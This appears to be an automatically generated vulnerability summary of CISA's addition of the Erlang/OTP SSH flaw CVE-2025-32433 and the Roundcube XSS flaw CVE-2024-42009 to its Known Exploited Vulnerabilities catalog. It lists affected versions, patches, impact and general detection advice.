Full Report
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two critical security flaws impacting Erlang/Open Telecom Platform (OTP) SSH and Roundcube to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities in question are listed below - CVE-2025-32433 (CVSS score: 10.0) - A missing authentication for a critical
Analysis Summary
# Vulnerability: Critical Flaws in Erlang/OTP SSH and Roundcube Added to CISA KEV Catalog
## CVE Details
- CVE ID: CVE-2025-32433
- CVSS Score: 10.0 (Critical)
- CWE: Missing Authentication for Critical Function
- CVE ID: CVE-2024-42009
- CVSS Score: 9.3 (Critical)
- CWE: Cross-Site Scripting (XSS)
## Affected Systems
- **Products (CVE-2025-32433):** Erlang/Open Telecom Platform (OTP) SSH server
- **Versions (CVE-2025-32433):** Versions prior to OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. (Note: Censys data suggests 340 exposed Erlang servers.)
- **Products (CVE-2024-42009):** RoundCube Webmail
- **Versions (CVE-2024-42009):** Versions prior to 1.6.8 and 1.5.8.
## Vulnerability Description
**CVE-2025-32433 (Erlang/OTP SSH):** A critical flaw in the Erlang/OTP SSH server where authentication is missing for a critical function. This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands without providing valid credentials.
**CVE-2024-42009 (Roundcube):** A Cross-Site Scripting (XSS) vulnerability present in `program/actions/mail/show.php`. A malicious, crafted email message can trigger a desanitization issue upon viewing, allowing a remote attacker to potentially steal session data or send emails on behalf of the victim user.
## Exploitation
- **Status (CVE-2025-32433):** Actively exploited (Added to CISA KEV catalog). PoC exploits have been publicly released.
- **Complexity (CVE-2025-32433):** Assumed Low, given the critical score and public PoC availability.
- **Attack Vector (CVE-2025-32433):** Network.
- **Status (CVE-2024-42009):** Added to CISA KEV catalog, indicating active exploitation, though specific details on the current exploitation campaign are not detailed (though related XSS abuses by threat actors were noted previously).
- **Complexity (CVE-2024-42009):** Assumed Medium (requires crafting a specific email).
- **Attack Vector (CVE-2024-42009):** Network (via crafted email).
## Impact
| Vulnerability | Confidentiality | Integrity | Availability |
| :--- | :--- | :--- | :--- |
| **CVE-2025-32433 (RCE)** | High (Full system compromise) | High (Full system compromise) | High (Service disruption/system compromise) |
| **CVE-2024-42009 (XSS)** | High (Session/Credential theft, email access) | High (Sending emails as victim) | Low (Limited to client-side impact on viewing user) |
## Remediation
### Patches
- **CVE-2025-32433:** Fixed in Erlang/OTP versions **OTP-27.3.3**, **OTP-26.2.5.11**, and **OTP-25.3.2.20**, released in April 2025.
- **CVE-2024-42009:** Fixed in RoundCube versions **1.6.8** and **1.5.8**, released in August 2024.
### Workarounds
- No specific workarounds detailed in the provided text, other than patching. Due to the nature of CVE-2025-32433 (unauthenticated RCE), immediate patching is highly recommended, especially for Federal Civilian Executive Branch (FCEB) agencies who have a remediation deadline of June 30, 2025.
## Detection
- **Indicators of Compromise (IOCs):** Not detailed in the text, but for CVE-2025-32433, monitoring SSH logs for connections or commands originating from unauthenticated sources is critical. For CVE-2024-42009, monitoring web server logs for unusual POST/GET requests related to the `program/actions/mail/show.php` endpoint might reveal targeted exploitation attempts.
- **Detection Methods and Tools:** CISA mandates that exposed systems should have necessary fixes applied following their KEV catalog inclusion. Network monitoring tools should look for anomalous SSH traffic patterns or unexpected code execution attempts on affected servers.
## References
- CISA KEV Catalog Update: hxxps://www.cisa.gov/news-events/alerts/2025/06/09/cisa-adds-two-known-exploited-vulnerabilities-catalog
- CVE-2025-32433 Disclosure: hxxps://thehackernews.com/2025/04/critical-erlangotp-ssh-vulnerability.html
- CVE-2024-42009 Disclosure: hxxps://thehackernews.com/2024/08/roundcube-webmail-flaws-allow-hackers.html
- CVE-2025-32433 PoC: hxxps://github.com/ProDefense/CVE-2025-32433
- CVE-2025-32433 PoC (Alternate): hxxps://platformsecurity.com/blog/CVE-2025-32433-poc